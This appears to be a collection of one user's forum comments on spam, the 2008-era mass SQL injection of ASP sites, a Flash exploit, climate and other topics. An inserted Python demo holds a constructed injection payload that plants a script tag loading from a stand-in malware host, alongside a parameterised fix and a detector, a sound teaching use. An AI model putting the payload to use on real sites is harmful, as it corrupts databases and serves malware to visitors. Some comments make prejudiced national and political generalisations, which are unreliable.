My hypotheses are:
1) Spam is not used in the effort of making money, but as a way of crippling the internet for sport.
OR
2) The majority of spam is sent by poor, hungry and stupid script kiddies who are as of now still poor, hungry and stupid.
Wrong on both counts. It's free to send spam, heck, more free than free, zombie PC's are sending them out. It requires effort and coordination to keep track of what spam you got, and these crime gangs aren't going to go to any effort to do that.
No one cares. It's a numbers game. The more, the better. And it's free. For them.
For us, some occasional schmuck does something that lets them take their money, way more than they ever imagined. What, you think this is Wal-Mart versus KMart on prices and service?
No, these are criminals out to separate you from your money.
Why are (most) forums spammed less than inboxes?
They are mostly spammed for different purposes, although there is plenty of viagra forum spamming, the kind that go to inboxes.
Forum spamming is mostly for posting links to sites that will try to download malware and take over your PC. That's their goal, that's where the money is, if not yours they will see if they can follow your connections and get through into a private corporate, government, or financial network. Meanwhile your PC is instructed to probe ports and try to take over more PC's and/or generate even more spam to others.
Always believe in money as the answer. They try to break in 24 hours a day on forums. They do it because it pays.
The only ones that I know about and make sense to me are undeliverable messages from email servers that got email from a spammer using some bogus from address with your domain. If you don't have a domain and mail server, I'm not sure how often they'd use something like a legitimate personal email address, if ever. Unless they happened to use your personal address as a bogus from address for spamming, you'd never see undeliverables backscatter.
What exactly do they have to gain by sending thousands of messages to one person (and this sounds like it was from one source)? Are they just trying to evade the spam filter, or do they perhaps think that if they just send enough, finally you'll start to believe them?
As usual, the answer is follow the money. They are not sending thousands of messages to you, they are sending millions of messages to millions of email addresses. Their return address? Perhaps your address, or a made up address from a legitimate domain, but not theirs.
They are not looking for a return email, a dialogue, a "could you send me some more info" stuff. These are professional thieves, crime gangs, mostly commies or at least third world socialists at best, out to clean the capitalist's clock and laugh at their ignorance and greed, of which we are exceedingly blessed with a bountiful harvest, or as Barnum said, one born every minute.
By using legitimate domains as return addresses, they get through spam filters for blacklisted domains. But heck, domains? These are being sent from PC's taken over and added to zombie networks, so there is no domain. There's only some schmuck's PC sending out spam while he goes, "Geez, my PC is slow. What's up with that dude? Hey, did you see this latest stuff I ripped off? Free downloads! kewl..."
The emails generate business. They have links which will take over your computer while lying to you about it. They pump up penny stocks, getting people to buy because wow man I can triple my money for a few dollars, man this is easy money, then they sell their stock they actually bought at a few pennies and you get to play musical chairs with all the other Wall Street wannabes.
And of course getting you to click on a link that takes over your PC is just the start of many more adventures, such as logging your keystrokes and sending them to one of our good friends in Eurasia where they are analyzed for bank account logins, payPal, eBay, a login to your corporate network, logins to networks they will infiltrate to see if it's a military or financial or government network with lots of money and secrets.
So in short, it's war, and backscatter is trivial collateral damage.
I have Postini on my email account and it blocks almost all spam, and about 80% of this non-deliverable stuff.
The first time you get it is very shocking, hundreds of emails coming in at once, but I just highlight the first header in my Inbox, hold my finger down on the arrow, and highlight whatever gets through Postini, then hit Delete. Pretty easy to see legitimate mail from these undeliverable messages.
So very easily taken care of, easier than blocking the forum spammers who apparently use email addresses from a site server where they are not able to get through to spam the forum.
If you don't have a spam blocker and are set up for your PC to talk to you every time an email arrives, then one of these attacks would be the start of a long relationship.
I'm all for getting rid of threads, but what are you going to replace them with?
Separate jobs communicating with message queues in some cases. Communications should be isolated out to a separate job so the OS is coordinating multi-tasking, not the program.
Some things, I understand, are threaded for responsiveness, such as monitoring for keystrokes while painting screens, but an interrupt mechanism would do it I think, where you get the responsiveness but no contention on data to update.
In general, thread() safe programming replaced by multiple lightweight OS jobs communicating.
I wrote my GW-BASIC code with Wordstar; I didn't know it had an editor. I remember the editor and how different that was when I did a gig with QBasic in the late 80's.
Microsoft's GW-Basic was a real workhorse on the early PC's in the 80's. I have to tell you that what we did with a few hundred k of memory, a 10 meg disk, and a 5 or 6 MHz CPU doesn't seem like it could be done considering what it takes nowadays.
And yet, apache users don't have to worry about this. Why? That's the argument I want to have.
Because the likely first step is bad guys in China scanning Google search results for web pages ending in .asp or .aspx. They then retrieve the pages and fill in forms with an SQL statement containing javascript code as a string and submit the page. All of this is automated.
In this case, it's SQL Server specific SQL syntax that retrieves field layouts for the database, then inserts the attacker's javascript string into *every* text database field that will hold it in the entire database. Holy cow.
Then any page whatsoever that retrieves any data from the database and displays it in a web page will pull the javascript along with the data and execute it after showing the data. That javascript then downloads malware from a specified Chinese site to the PC.
Game over.
Personally I am blown away by the incompetence of the defense attorney. Clearly he must have understood Reiser (guilty or not) would not help his case by testifying. He should never have been put on the stand.
Clearly you haven't been following the case.
What an obnoxious headline.
500 Thousand is more readable. Your post is what is obnoxious.
However, it is now abundantly clear that the attack is NOT ASP-specific...
I guess it's .asp specific because .asp web pages with form fields were targeted and SQL Server specific metadata was SELECTed to get fields to update with javascript, which in itself is not .asp specific but SQL Server specific.
But it is not abundantly clear to me why your post is modded informative. Did you find sites that were not IIS to be infected with this?
I thought that javascript was rather limited in what it could do on a client. But I guess all it needs for some types of SQL injection is the ability to rewrite URLs and html data pages which it pretty much has to have. Or is it more specific than that?
The problem with a jumble of news links and comments is that no coherent explanation is ever given for what is going on. The javascript only takes effect later, and only affects the user's PC, downloading malware to it from the mentioned sites.
The first step is bad guys in China (because one, these are Chinese sites the javascript downloads malware from, and two, because the only thing coming across the net from China is bad) scanning Google search results for web pages ending in .asp or .aspx.
They then retrieve the pages and fill in forms with an SQL statement containing javascript code as a string and submit the page. What do they do this with? Not javascript. Simple programming using HTTP commands. All of this is automated.
This is where the bad programming of the people who programmed processing the web pages comes in. For those pages that don't thoroughly screen web form input for SQL commands (like "enter name, ok, here's my name plus an SQL command to insert javascript into fields in your database, how do you like them apples?" type form entry), then they will get javascript inserted into their database fields.
Sounds too bizarre to be true? Every time a programmer just sucks whatever is entered into a web page form field and strings it together to execute it as a command to update the database, they run the risk of the part that came from the web page containing an SQL command from someone evil that does other things to the database, in other words, SQL "injected" (or more easily envisioned, appended as a second or more additional SQL commands) to the original trivial SQL statement to take name and stick it in the name field in the database.
So far javascript isn't involved. The page is sent down to a program that has found it by searching Google for .asp or .aspx pages. Of course the web site doesn't know this. As far as it knows it's a person running a browser and interested in their site content.
Then the program fills in the form fields with an SQL command and submits the page. At this point just good old web server programming in whatever language (MS type, given .asp) to process the page like it's someone that wants to register or whatever the page with form fields is. So still no javascript.
But when the programming strings together with an SQL command the contents of the form field, and doesn't check that it doesn't have more SQL in it, the execution of the SQL which was intended only to insert or update a database field now does a whole lot more, whatever SQL the attacker put in that and all other form fields on the page. All it takes is one of them not to be checked properly.
And what was that SQL put in? In this case, it's MS SQL specific SQL that retrieves database layouts, then inserts the attacker's javascript string (ahh! we now see javascript but it still isn't executing yet) into *every* database field in the entire database. Holy cow. Basically what we saw from the linked IIS admin's security blog posts was that only a portion of the database would contain the javascript because SQL is typically configured to time out after a certain amount of time, so it crammed as much as it could until the plug was pulled on it.
So the javascript is in the database, in fields like name and city or whatever, but it still isn't executing and has no effect on the server whatsoever. The injected SQL, which is just SQL, not javascript, did all this because it wasn't checked for and stripped out of the web page form field.
Then what happens? Any page whatsoever that retrieves any data from the database and displa
Why not just take away text SQL queries from web development environments?
It's all they have.
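An added example, not code from the thread, for the explanation above and the "take away text SQL queries" exchange: sqlite3 stands in for SQL Server and the script tag is a constructed placeholder. It shows the string-gluing insert the comment describes beside the parameterised form, a scan over every text column for injected script (the cleanup check an admin would run), and output escaping so stored script is shown as text rather than run.

```python
import html
import sqlite3

# Constructed placeholder for the injected tag; not a real site.
INJECTED_TAG = '<script src="http://malware.example/x.js"></script>'

# Constructed form input: the name field carries a second, appended statement that
# tags every row's city column, the pattern the comment describes.
DEMO_PAYLOAD = "eve', 'Elsewhere'); UPDATE profile SET city = city || '" + INJECTED_TAG + "'; --"


def make_db():
    """Constructed sample table, the sort a registration form writes to."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE profile (id INTEGER PRIMARY KEY, name TEXT, city TEXT)")
    conn.execute("INSERT INTO profile (name, city) VALUES ('alice', 'Austin')")
    conn.execute("INSERT INTO profile (name, city) VALUES ('bob', 'Boston')")
    conn.commit()
    return conn


def register_vulnerable(conn, name, city):
    """Form values glued straight into the SQL text and run as a script, so any
    statement appended inside a field executes too."""
    sql = "INSERT INTO profile (name, city) VALUES ('%s', '%s');" % (name, city)
    conn.executescript(sql)


def register_safe(conn, name, city):
    """Parameterised insert: values are bound, never parsed as SQL, so the same
    input is stored as one inert string."""
    conn.execute("INSERT INTO profile (name, city) VALUES (?, ?)", (name, city))
    conn.commit()


def find_injected_rows(conn, marker="<script"):
    """Walk every TEXT column of every table and return (table, column, rowid)
    for each row holding the marker. This is the defender's check after a mass
    injection, and it flags script-looking data however it got there."""
    hits = []
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        cols = [c[1] for c in conn.execute('PRAGMA table_info("%s")' % table)
                if c[2].upper() == "TEXT"]
        for col in cols:
            rows = conn.execute(
                'SELECT rowid FROM "%s" WHERE instr("%s", ?) > 0' % (table, col),
                (marker,),
            ).fetchall()
            hits.extend((table, col, r[0]) for r in rows)
    return hits


def render_cell(value):
    """Output encoding: a field that does carry script text is displayed as
    text, so the browser never executes it."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    db = make_db()
    register_vulnerable(db, DEMO_PAYLOAD, "ignored")
    print("glued query, rows tagged:", find_injected_rows(db))
    db = make_db()
    register_safe(db, DEMO_PAYLOAD, "ignored")
    print("bound query, rows tagged:", find_injected_rows(db))
    print("rendered:", render_cell(INJECTED_TAG))
```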
The article states a google search found over 500,000 modified pages. The post states over 500,000 servers.
From my experience Google only shows one to a few pages from a website, and you have to click more results on a site result set to see all that would match on that site.
I did a test with data I know to be on many pages on my site and the count was 35, the top 5 from my site. I counted down the results and there were 35, with see more results as a generic show everything on all sites.
I clicked on repeat search with omitted results included and the count went to 485, and the first few hundred are from my site.
I would say if the people reporting the 500,000 pages or sites did a preliminary Google search the result count would be closer to site count, and if they clicked on repeat search with omitted results included the results count would be pages.
That is correct. This is only a recent phenomenon. I supplied information about the mass of ice on Greenland and how much that ice would raise the sea level, and that the glaciers are starting to accelerate their slide into the sea.
We also have pictures of larger areas of the Arctic seasonally melted than in recent history, and that the amount of carbon particles per million is higher than recent history and rising.
A reasoned look at the information can be made, regardless of the cause or beliefs.
Your socialist stuff (which has no basis) and Creator mentions designate your writings as from a very conservative right winger person. I don't agree with hardly anything you stand for, but I can answer a question or point out a mistaken contention regardless of the source, and I did.
You don't need a citation for this!
Your problem is you act like all the ice is already in the ocean. Greenland holds only 10% of glacier ice but if Greenland's ice melts it will raise the sea level 21 feet.
In fact, as you point out, ice raises it just as much and it doesn't even have to melt. The glaciers just have to slide out to sea as icebergs. And scientists are watching that very thing accelerate.
Lost appeal? I didn't think there was that much appeal for Vista capable to start with...
Click on his handle at the top of the page and you'll get an idea.
I just looked at this guy's homepage and his research roadmap. If anyone has a breakthrough in AI research in the next few years I'll place my bet on him.
I think that a better write-up may have made that more clear. The one that was actually posted on the Slashdot front page is pretty weak.
Just click on TFA. It explains it well.
I don't know either flash or VMs in general, but in order for the attacker to return a fake value from a malloc call, shouldn't the attacker already have control of libc (in C) or of the internals of the VM in that case? Meaning he already can do whatever he wants...
I don't know why this is rated Interesting, but the answer is no.
explain this event in terms that a person with a sex life not involving the Internet could understand?
does blow up dolls count?
On a modern OS you have to work hard to make malloc fail. OSs will grant memory requests far above the amount of physical memory, and will even overcommit the virtual memory on the theory that you're not going to use all of it anyway.
Although this is true, the first step of the ActionScript VM (Flash) exploit was to create a malware Flash script that had a negative number for number of tags, or something of the like, which reliably causes the VM malloc processing for that parm to return NULL.
This was not a "gee, if a malloc ever returns NULL, this will work" exploit, but an exploit that starts out causing malloc to return NULL, then use the NULL pointer.
No, I didn't miss the point. I said it's an awfully complex way to generate difficult to OCR images, actually one of the dumbest things I've ever heard of.
Some of the difficulties. You need to break the un-OCRable image into groups of small letters. Try running an un-OCRable "indecipherable" by anyone as a registration test (and just part of the test, you say they also have to answer another set of letters alongside it that you know what it is). You know how many people are going to say FU. It'll be close to unity.
Or with that unsettling feedback, you try to break images up into smaller groups of letters and then the person doesn't have the context of the word to figure out the letter. And that's assuming you even have a clue how to break un-OCRable letter groups approximating words into smaller image subsets, which I assure you isn't trivial.
Then after all that, you have all this I don't know what it is, but I'm going to get "probabilities" and "assurances" and "I'm pretty sure this must be it because lots of people are getting close to answering it the same" control logic stuff going on.
And then after that hoopla you feed this word or small groups of letters back to some central place to be integrated into an OCR'ed document somehow.
I would call it Rube Goldberg OCR. Just amazingly stupid.